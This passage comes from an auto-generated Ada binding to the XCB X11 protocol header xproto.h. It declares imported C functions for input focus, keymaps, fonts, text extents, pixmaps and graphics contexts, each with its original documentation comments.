xcb_timestamp_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:8409 with Import => True, Convention => C, External_Name => "xcb_set_input_focus"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_get_input_focus (c : access xcb.xcb_connection_t) return xcb_get_input_focus_cookie_t -- /usr/include/xcb/xproto.h:8423 with Import => True, Convention => C, External_Name => "xcb_get_input_focus"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_get_input_focus_unchecked (c : access xcb.xcb_connection_t) return xcb_get_input_focus_cookie_t -- /usr/include/xcb/xproto.h:8437 with Import => True, Convention => C, External_Name => "xcb_get_input_focus_unchecked"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_get_input_focus_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_get_input_focus_reply (c : access xcb.xcb_connection_t; cookie : xcb_get_input_focus_cookie_t; e : System.Address) return access xcb_get_input_focus_reply_t -- /usr/include/xcb/xproto.h:8454 with Import => True, Convention => C, External_Name => "xcb_get_input_focus_reply"; --*< --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_query_keymap (c : access xcb.xcb_connection_t) return xcb_query_keymap_cookie_t -- /usr/include/xcb/xproto.h:8467 with Import => True, Convention => C, External_Name => "xcb_query_keymap"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_query_keymap_unchecked (c : access xcb.xcb_connection_t) return xcb_query_keymap_cookie_t -- /usr/include/xcb/xproto.h:8481 with Import => True, Convention => C, External_Name => "xcb_query_keymap_unchecked"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_query_keymap_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_query_keymap_reply (c : access xcb.xcb_connection_t; cookie : xcb_query_keymap_cookie_t; e : System.Address) return access xcb_query_keymap_reply_t -- /usr/include/xcb/xproto.h:8498 with Import => True, Convention => C, External_Name => "xcb_query_keymap_reply"; --*< function xcb_open_font_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:8503 with Import => True, Convention => C, External_Name => "xcb_open_font_sizeof"; --* -- * @brief opens a font -- * -- * @param c The connection -- * @param fid The ID with which you will refer to the font, created by `xcb_generate_id`. -- * @param name_len Length (in bytes) of \a name. -- * @param name A pattern describing an X core font. -- * @return A cookie -- * -- * Opens any X core font matching the given \a name (for example "-misc-fixed-*"). -- * -- * Note that X core fonts are deprecated (but still supported) in favor of -- * client-side rendering using Xft. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_open_font_checked (c : access xcb.xcb_connection_t; fid : xcb_font_t; name_len : bits_stdint_uintn_h.uint16_t; name : Interfaces.C.Strings.chars_ptr) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:8524 with Import => True, Convention => C, External_Name => "xcb_open_font_checked"; --* -- * @brief opens a font -- * -- * @param c The connection -- * @param fid The ID with which you will refer to the font, created by `xcb_generate_id`. -- * @param name_len Length (in bytes) of \a name. -- * @param name A pattern describing an X core font. -- * @return A cookie -- * -- * Opens any X core font matching the given \a name (for example "-misc-fixed-*"). -- * -- * Note that X core fonts are deprecated (but still supported) in favor of -- * client-side rendering using Xft. -- * -- function xcb_open_font (c : access xcb.xcb_connection_t; fid : xcb_font_t; name_len : bits_stdint_uintn_h.uint16_t; name : Interfaces.C.Strings.chars_ptr) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:8545 with Import => True, Convention => C, External_Name => "xcb_open_font"; function xcb_open_font_name (R : access constant xcb_open_font_request_t) return Interfaces.C.Strings.chars_ptr -- /usr/include/xcb/xproto.h:8551 with Import => True, Convention => C, External_Name => "xcb_open_font_name"; function xcb_open_font_name_length (R : access constant xcb_open_font_request_t) return int -- /usr/include/xcb/xproto.h:8554 with Import => True, Convention => C, External_Name => "xcb_open_font_name_length"; function xcb_open_font_name_end (R : access constant xcb_open_font_request_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:8557 with Import => True, Convention => C, External_Name => "xcb_open_font_name_end"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_close_font_checked (c : access xcb.xcb_connection_t; font : xcb_font_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:8571 with Import => True, Convention => C, External_Name => "xcb_close_font_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_close_font (c : access xcb.xcb_connection_t; font : xcb_font_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:8583 with Import => True, Convention => C, External_Name => "xcb_close_font"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_fontprop_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_fontprop_t) -- procedure xcb_fontprop_next (i : access xcb_fontprop_iterator_t) -- /usr/include/xcb/xproto.h:8595 with Import => True, Convention => C, External_Name => "xcb_fontprop_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_fontprop_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_fontprop_end (i : xcb_fontprop_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:8607 with Import => True, Convention => C, External_Name => "xcb_fontprop_end"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_charinfo_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_charinfo_t) -- procedure xcb_charinfo_next (i : access xcb_charinfo_iterator_t) -- /usr/include/xcb/xproto.h:8618 with Import => True, Convention => C, External_Name => "xcb_charinfo_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_charinfo_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_charinfo_end (i : xcb_charinfo_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:8630 with Import => True, Convention => C, External_Name => "xcb_charinfo_end"; function xcb_query_font_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:8633 with Import => True, Convention => C, External_Name => "xcb_query_font_sizeof"; --* -- * @brief query font metrics -- * -- * @param c The connection -- * @param font The fontable (Font or Graphics Context) to query. -- * @return A cookie -- * -- * Queries information associated with the font. -- * -- function xcb_query_font (c : access xcb.xcb_connection_t; font : xcb_fontable_t) return xcb_query_font_cookie_t -- /usr/include/xcb/xproto.h:8646 with Import => True, Convention => C, External_Name => "xcb_query_font"; --* -- * @brief query font metrics -- * -- * @param c The connection -- * @param font The fontable (Font or Graphics Context) to query. -- * @return A cookie -- * -- * Queries information associated with the font. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_query_font_unchecked (c : access xcb.xcb_connection_t; font : xcb_fontable_t) return xcb_query_font_cookie_t -- /usr/include/xcb/xproto.h:8663 with Import => True, Convention => C, External_Name => "xcb_query_font_unchecked"; function xcb_query_font_properties (R : access constant xcb_query_font_reply_t) return access xcb_fontprop_t -- /usr/include/xcb/xproto.h:8667 with Import => True, Convention => C, External_Name => "xcb_query_font_properties"; function xcb_query_font_properties_length (R : access constant xcb_query_font_reply_t) return int -- /usr/include/xcb/xproto.h:8670 with Import => True, Convention => C, External_Name => "xcb_query_font_properties_length"; function xcb_query_font_properties_iterator (R : access constant xcb_query_font_reply_t) return xcb_fontprop_iterator_t -- /usr/include/xcb/xproto.h:8673 with Import => True, Convention => C, External_Name => "xcb_query_font_properties_iterator"; function xcb_query_font_char_infos (R : access constant xcb_query_font_reply_t) return access xcb_charinfo_t -- /usr/include/xcb/xproto.h:8676 with Import => True, Convention => C, External_Name => "xcb_query_font_char_infos"; function xcb_query_font_char_infos_length (R : access constant xcb_query_font_reply_t) return int -- /usr/include/xcb/xproto.h:8679 with Import => True, Convention => C, External_Name => "xcb_query_font_char_infos_length"; function xcb_query_font_char_infos_iterator (R : access constant xcb_query_font_reply_t) return xcb_charinfo_iterator_t -- /usr/include/xcb/xproto.h:8682 with Import => True, Convention => C, External_Name => "xcb_query_font_char_infos_iterator"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_query_font_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_query_font_reply (c : access xcb.xcb_connection_t; cookie : xcb_query_font_cookie_t; e : System.Address) return access xcb_query_font_reply_t -- /usr/include/xcb/xproto.h:8699 with Import => True, Convention => C, External_Name => "xcb_query_font_reply"; --*< function xcb_query_text_extents_sizeof (u_buffer : System.Address; string_len : bits_stdint_uintn_h.uint32_t) return int -- /usr/include/xcb/xproto.h:8704 with Import => True, Convention => C, External_Name => "xcb_query_text_extents_sizeof"; --* -- * @brief get text extents -- * -- * @param c The connection -- * @param font The \a font to calculate text extents in. You can also pass a graphics context. -- * @param string_len The number of characters in \a string. -- * @param string The text to get text extents for. -- * @return A cookie -- * -- * Query text extents from the X11 server. This request returns the bounding box -- * of the specified 16-bit character string in the specified \a font or the font -- * contained in the specified graphics context. -- * -- * `font_ascent` is set to the maximum of the ascent metrics of all characters in -- * the string. `font_descent` is set to the maximum of the descent metrics. -- * `overall_width` is set to the sum of the character-width metrics of all -- * characters in the string. For each character in the string, let W be the sum of -- * the character-width metrics of all characters preceding it in the string. Let L -- * be the left-side-bearing metric of the character plus W. Let R be the -- * right-side-bearing metric of the character plus W. The lbearing member is set -- * to the minimum L of all characters in the string. The rbearing member is set to -- * the maximum R. -- * -- * For fonts defined with linear indexing rather than 2-byte matrix indexing, each -- * `xcb_char2b_t` structure is interpreted as a 16-bit number with byte1 as the -- * most significant byte. If the font has no defined default character, undefined -- * characters in the string are taken to have all zero metrics. -- * -- * Characters with all zero metrics are ignored. If the font has no defined -- * default_char, the undefined characters in the string are also ignored. -- * -- function xcb_query_text_extents (c : access xcb.xcb_connection_t; font : xcb_fontable_t; string_len : bits_stdint_uintn_h.uint32_t; string : access constant xcb_char2b_t) return xcb_query_text_extents_cookie_t -- /usr/include/xcb/xproto.h:8740 with Import => True, Convention => C, External_Name => "xcb_query_text_extents"; --* -- * @brief get text extents -- * -- * @param c The connection -- * @param font The \a font to calculate text extents in. You can also pass a graphics context. -- * @param string_len The number of characters in \a string. -- * @param string The text to get text extents for. -- * @return A cookie -- * -- * Query text extents from the X11 server. This request returns the bounding box -- * of the specified 16-bit character string in the specified \a font or the font -- * contained in the specified graphics context. -- * -- * `font_ascent` is set to the maximum of the ascent metrics of all characters in -- * the string. `font_descent` is set to the maximum of the descent metrics. -- * `overall_width` is set to the sum of the character-width metrics of all -- * characters in the string. For each character in the string, let W be the sum of -- * the character-width metrics of all characters preceding it in the string. Let L -- * be the left-side-bearing metric of the character plus W. Let R be the -- * right-side-bearing metric of the character plus W. The lbearing member is set -- * to the minimum L of all characters in the string. The rbearing member is set to -- * the maximum R. -- * -- * For fonts defined with linear indexing rather than 2-byte matrix indexing, each -- * `xcb_char2b_t` structure is interpreted as a 16-bit number with byte1 as the -- * most significant byte. If the font has no defined default character, undefined -- * characters in the string are taken to have all zero metrics. -- * -- * Characters with all zero metrics are ignored. If the font has no defined -- * default_char, the undefined characters in the string are also ignored. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_query_text_extents_unchecked (c : access xcb.xcb_connection_t; font : xcb_fontable_t; string_len : bits_stdint_uintn_h.uint32_t; string : access constant xcb_char2b_t) return xcb_query_text_extents_cookie_t -- /usr/include/xcb/xproto.h:8781 with Import => True, Convention => C, External_Name => "xcb_query_text_extents_unchecked"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_query_text_extents_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_query_text_extents_reply (c : access xcb.xcb_connection_t; cookie : xcb_query_text_extents_cookie_t; e : System.Address) return access xcb_query_text_extents_reply_t -- /usr/include/xcb/xproto.h:8801 with Import => True, Convention => C, External_Name => "xcb_query_text_extents_reply"; --*< function xcb_str_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:8806 with Import => True, Convention => C, External_Name => "xcb_str_sizeof"; function xcb_str_name (R : access constant xcb_str_t) return Interfaces.C.Strings.chars_ptr -- /usr/include/xcb/xproto.h:8809 with Import => True, Convention => C, External_Name => "xcb_str_name"; function xcb_str_name_length (R : access constant xcb_str_t) return int -- /usr/include/xcb/xproto.h:8812 with Import => True, Convention => C, External_Name => "xcb_str_name_length"; function xcb_str_name_end (R : access constant xcb_str_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:8815 with Import => True, Convention => C, External_Name => "xcb_str_name_end"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_str_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_str_t) -- procedure xcb_str_next (i : access xcb_str_iterator_t) -- /usr/include/xcb/xproto.h:8826 with Import => True, Convention => C, External_Name => "xcb_str_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_str_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_str_end (i : xcb_str_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:8838 with Import => True, Convention => C, External_Name => "xcb_str_end"; function xcb_list_fonts_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:8841 with Import => True, Convention => C, External_Name => "xcb_list_fonts_sizeof"; --* -- * @brief get matching font names -- * -- * @param c The connection -- * @param max_names The maximum number of fonts to be returned. -- * @param pattern_len The length (in bytes) of \a pattern. -- * @param pattern A font pattern, for example "-misc-fixed-*". -- * \n -- * The asterisk (*) is a wildcard for any number of characters. The question mark -- * (?) is a wildcard for a single character. Use of uppercase or lowercase does -- * not matter. -- * @return A cookie -- * -- * Gets a list of available font names which match the given \a pattern. -- * -- function xcb_list_fonts (c : access xcb.xcb_connection_t; max_names : bits_stdint_uintn_h.uint16_t; pattern_len : bits_stdint_uintn_h.uint16_t; pattern : Interfaces.C.Strings.chars_ptr) return xcb_list_fonts_cookie_t -- /usr/include/xcb/xproto.h:8860 with Import => True, Convention => C, External_Name => "xcb_list_fonts"; --* -- * @brief get matching font names -- * -- * @param c The connection -- * @param max_names The maximum number of fonts to be returned. -- * @param pattern_len The length (in bytes) of \a pattern. -- * @param pattern A font pattern, for example "-misc-fixed-*". -- * \n -- * The asterisk (*) is a wildcard for any number of characters. The question mark -- * (?) is a wildcard for a single character. Use of uppercase or lowercase does -- * not matter. -- * @return A cookie -- * -- * Gets a list of available font names which match the given \a pattern. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_list_fonts_unchecked (c : access xcb.xcb_connection_t; max_names : bits_stdint_uintn_h.uint16_t; pattern_len : bits_stdint_uintn_h.uint16_t; pattern : Interfaces.C.Strings.chars_ptr) return xcb_list_fonts_cookie_t -- /usr/include/xcb/xproto.h:8885 with Import => True, Convention => C, External_Name => "xcb_list_fonts_unchecked"; function xcb_list_fonts_names_length (R : access constant xcb_list_fonts_reply_t) return int -- /usr/include/xcb/xproto.h:8891 with Import => True, Convention => C, External_Name => "xcb_list_fonts_names_length"; function xcb_list_fonts_names_iterator (R : access constant xcb_list_fonts_reply_t) return xcb_str_iterator_t -- /usr/include/xcb/xproto.h:8894 with Import => True, Convention => C, External_Name => "xcb_list_fonts_names_iterator"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_list_fonts_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_list_fonts_reply (c : access xcb.xcb_connection_t; cookie : xcb_list_fonts_cookie_t; e : System.Address) return access xcb_list_fonts_reply_t -- /usr/include/xcb/xproto.h:8911 with Import => True, Convention => C, External_Name => "xcb_list_fonts_reply"; --*< function xcb_list_fonts_with_info_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:8916 with Import => True, Convention => C, External_Name => "xcb_list_fonts_with_info_sizeof"; --* -- * @brief get matching font names and information -- * -- * @param c The connection -- * @param max_names The maximum number of fonts to be returned. -- * @param pattern_len The length (in bytes) of \a pattern. -- * @param pattern A font pattern, for example "-misc-fixed-*". -- * \n -- * The asterisk (*) is a wildcard for any number of characters. The question mark -- * (?) is a wildcard for a single character. Use of uppercase or lowercase does -- * not matter. -- * @return A cookie -- * -- * Gets a list of available font names which match the given \a pattern. -- * -- function xcb_list_fonts_with_info (c : access xcb.xcb_connection_t; max_names : bits_stdint_uintn_h.uint16_t; pattern_len : bits_stdint_uintn_h.uint16_t; pattern : Interfaces.C.Strings.chars_ptr) return xcb_list_fonts_with_info_cookie_t -- /usr/include/xcb/xproto.h:8935 with Import => True, Convention => C, External_Name => "xcb_list_fonts_with_info"; --* -- * @brief get matching font names and information -- * -- * @param c The connection -- * @param max_names The maximum number of fonts to be returned. -- * @param pattern_len The length (in bytes) of \a pattern. -- * @param pattern A font pattern, for example "-misc-fixed-*". -- * \n -- * The asterisk (*) is a wildcard for any number of characters. The question mark -- * (?) is a wildcard for a single character. Use of uppercase or lowercase does -- * not matter. -- * @return A cookie -- * -- * Gets a list of available font names which match the given \a pattern. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_list_fonts_with_info_unchecked (c : access xcb.xcb_connection_t; max_names : bits_stdint_uintn_h.uint16_t; pattern_len : bits_stdint_uintn_h.uint16_t; pattern : Interfaces.C.Strings.chars_ptr) return xcb_list_fonts_with_info_cookie_t -- /usr/include/xcb/xproto.h:8960 with Import => True, Convention => C, External_Name => "xcb_list_fonts_with_info_unchecked"; function xcb_list_fonts_with_info_properties (R : access constant xcb_list_fonts_with_info_reply_t) return access xcb_fontprop_t -- /usr/include/xcb/xproto.h:8966 with Import => True, Convention => C, External_Name => "xcb_list_fonts_with_info_properties"; function xcb_list_fonts_with_info_properties_length (R : access constant xcb_list_fonts_with_info_reply_t) return int -- /usr/include/xcb/xproto.h:8969 with Import => True, Convention => C, External_Name => "xcb_list_fonts_with_info_properties_length"; function xcb_list_fonts_with_info_properties_iterator (R : access constant xcb_list_fonts_with_info_reply_t) return xcb_fontprop_iterator_t -- /usr/include/xcb/xproto.h:8972 with Import => True, Convention => C, External_Name => "xcb_list_fonts_with_info_properties_iterator"; function xcb_list_fonts_with_info_name (R : access constant xcb_list_fonts_with_info_reply_t) return Interfaces.C.Strings.chars_ptr -- /usr/include/xcb/xproto.h:8975 with Import => True, Convention => C, External_Name => "xcb_list_fonts_with_info_name"; function xcb_list_fonts_with_info_name_length (R : access constant xcb_list_fonts_with_info_reply_t) return int -- /usr/include/xcb/xproto.h:8978 with Import => True, Convention => C, External_Name => "xcb_list_fonts_with_info_name_length"; function xcb_list_fonts_with_info_name_end (R : access constant xcb_list_fonts_with_info_reply_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:8981 with Import => True, Convention => C, External_Name => "xcb_list_fonts_with_info_name_end"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_list_fonts_with_info_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_list_fonts_with_info_reply (c : access xcb.xcb_connection_t; cookie : xcb_list_fonts_with_info_cookie_t; e : System.Address) return access xcb_list_fonts_with_info_reply_t -- /usr/include/xcb/xproto.h:8998 with Import => True, Convention => C, External_Name => "xcb_list_fonts_with_info_reply"; --*< function xcb_set_font_path_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:9003 with Import => True, Convention => C, External_Name => "xcb_set_font_path_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_set_font_path_checked (c : access xcb.xcb_connection_t; font_qty : bits_stdint_uintn_h.uint16_t; font : access constant xcb_str_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9017 with Import => True, Convention => C, External_Name => "xcb_set_font_path_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_set_font_path (c : access xcb.xcb_connection_t; font_qty : bits_stdint_uintn_h.uint16_t; font : access constant xcb_str_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9030 with Import => True, Convention => C, External_Name => "xcb_set_font_path"; function xcb_set_font_path_font_length (R : access constant xcb_set_font_path_request_t) return int -- /usr/include/xcb/xproto.h:9035 with Import => True, Convention => C, External_Name => "xcb_set_font_path_font_length"; function xcb_set_font_path_font_iterator (R : access constant xcb_set_font_path_request_t) return xcb_str_iterator_t -- /usr/include/xcb/xproto.h:9038 with Import => True, Convention => C, External_Name => "xcb_set_font_path_font_iterator"; function xcb_get_font_path_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:9041 with Import => True, Convention => C, External_Name => "xcb_get_font_path_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_get_font_path (c : access xcb.xcb_connection_t) return xcb_get_font_path_cookie_t -- /usr/include/xcb/xproto.h:9052 with Import => True, Convention => C, External_Name => "xcb_get_font_path"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_get_font_path_unchecked (c : access xcb.xcb_connection_t) return xcb_get_font_path_cookie_t -- /usr/include/xcb/xproto.h:9066 with Import => True, Convention => C, External_Name => "xcb_get_font_path_unchecked"; function xcb_get_font_path_path_length (R : access constant xcb_get_font_path_reply_t) return int -- /usr/include/xcb/xproto.h:9069 with Import => True, Convention => C, External_Name => "xcb_get_font_path_path_length"; function xcb_get_font_path_path_iterator (R : access constant xcb_get_font_path_reply_t) return xcb_str_iterator_t -- /usr/include/xcb/xproto.h:9072 with Import => True, Convention => C, External_Name => "xcb_get_font_path_path_iterator"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_get_font_path_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_get_font_path_reply (c : access xcb.xcb_connection_t; cookie : xcb_get_font_path_cookie_t; e : System.Address) return access xcb_get_font_path_reply_t -- /usr/include/xcb/xproto.h:9089 with Import => True, Convention => C, External_Name => "xcb_get_font_path_reply"; --*< --* -- * @brief Creates a pixmap -- * -- * @param c The connection -- * @param depth TODO -- * @param pid The ID with which you will refer to the new pixmap, created by -- * `xcb_generate_id`. -- * @param drawable Drawable to get the screen from. -- * @param width The width of the new pixmap. -- * @param height The height of the new pixmap. -- * @return A cookie -- * -- * Creates a pixmap. The pixmap can only be used on the same screen as \a drawable -- * is on and only with drawables of the same \a depth. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_create_pixmap_checked (c : access xcb.xcb_connection_t; depth : bits_stdint_uintn_h.uint8_t; pid : xcb_pixmap_t; drawable : xcb_drawable_t; width : bits_stdint_uintn_h.uint16_t; height : bits_stdint_uintn_h.uint16_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9113 with Import => True, Convention => C, External_Name => "xcb_create_pixmap_checked"; --* -- * @brief Creates a pixmap -- * -- * @param c The connection -- * @param depth TODO -- * @param pid The ID with which you will refer to the new pixmap, created by -- * `xcb_generate_id`. -- * @param drawable Drawable to get the screen from. -- * @param width The width of the new pixmap. -- * @param height The height of the new pixmap. -- * @return A cookie -- * -- * Creates a pixmap. The pixmap can only be used on the same screen as \a drawable -- * is on and only with drawables of the same \a depth. -- * -- function xcb_create_pixmap (c : access xcb.xcb_connection_t; depth : bits_stdint_uintn_h.uint8_t; pid : xcb_pixmap_t; drawable : xcb_drawable_t; width : bits_stdint_uintn_h.uint16_t; height : bits_stdint_uintn_h.uint16_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9137 with Import => True, Convention => C, External_Name => "xcb_create_pixmap"; --* -- * @brief Destroys a pixmap -- * -- * @param c The connection -- * @param pixmap The pixmap to destroy. -- * @return A cookie -- * -- * Deletes the association between the pixmap ID and the pixmap. The pixmap -- * storage will be freed when there are no more references to it. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_free_pixmap_checked (c : access xcb.xcb_connection_t; pixmap : xcb_pixmap_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9159 with Import => True, Convention => C, External_Name => "xcb_free_pixmap_checked"; --* -- * @brief Destroys a pixmap -- * -- * @param c The connection -- * @param pixmap The pixmap to destroy. -- * @return A cookie -- * -- * Deletes the association between the pixmap ID and the pixmap. The pixmap -- * storage will be freed when there are no more references to it. -- * -- function xcb_free_pixmap (c : access xcb.xcb_connection_t; pixmap : xcb_pixmap_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9174 with Import => True, Convention => C, External_Name => "xcb_free_pixmap"; function xcb_create_gc_value_list_serialize (u_buffer : System.Address; value_mask : bits_stdint_uintn_h.uint32_t; u_aux : access constant xcb_create_gc_value_list_t) return int -- /usr/include/xcb/xproto.h:9178 with Import => True, Convention => C, External_Name => "xcb_create_gc_value_list_serialize"; function xcb_create_gc_value_list_unpack (u_buffer : System.Address; value_mask : bits_stdint_uintn_h.uint32_t; u_aux : access xcb_create_gc_value_list_t) return int -- /usr/include/xcb/xproto.h:9183 with Import => True, Convention => C, External_Name => "xcb_create_gc_value_list_unpack"; function xcb_create_gc_value_list_sizeof (u_buffer : System.Address; value_mask : bits_stdint_uintn_h.uint32_t) return int -- /usr/include/xcb/xproto.h:9188 with Import => True, Convention => C, External_Name => "xcb_create_gc_value_list_sizeof"; function xcb_create_gc_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:9192 with Import => True, Convention => C, External_Name => "xcb_create_gc_sizeof"; --* -- * @brief Creates a graphics context -- * -- * @param c The connection -- * @param cid The ID with which you will refer to the graphics context, created by -- * `xcb_generate_id`. -- * @param drawable Drawable to get the root/depth from. -- * @return A cookie -- * -- * Creates a graphics context. The graphics context can be used with any drawable -- * that has the same root and depth as the specified drawable. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_create_gc_checked (c : access xcb.xcb_connection_t; cid : xcb_gcontext_t; drawable : xcb_drawable_t; value_mask : bits_stdint_uintn_h.uint32_t; value_list : System.Address) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9211 with Import => True, Convention => C, External_Name => "xcb_create_gc_checked"; --* -- * @brief Creates a graphics context -- * -- * @param c The connection -- * @param cid The ID with which you will refer to the graphics context, created by -- * `xcb_generate_id`. -- * @param drawable Drawable to get the root/depth from. -- * @return A cookie -- * -- * Creates a graphics context. The graphics context can be used with any drawable -- * that has the same root and depth as the specified drawable. -- * -- function xcb_create_gc (c : access xcb.xcb_connection_t; cid : xcb_gcontext_t; drawable : xcb_drawable_t; value_mask : bits_stdint_uintn_h.uint32_t; value_list : System.Address) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9231 with Import => True, Convention => C, External_Name => "xcb_create_gc"; --* -- * @brief Creates a graphics context -- * -- * @param c The connection -- * @param cid The ID with which you will refer to the graphics context, created by -- * `xcb_generate_id`. -- * @param drawable Drawable to get the root/depth from. -- * @return A cookie -- * -- * Creates a graphics context. The graphics context can be used with any drawable -- * that has the same root and depth as the specified drawable. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_create_gc_aux_checked (c : access xcb.xcb_connection_t; cid : xcb_gcontext_t; drawable : xcb_drawable_t; value_mask : 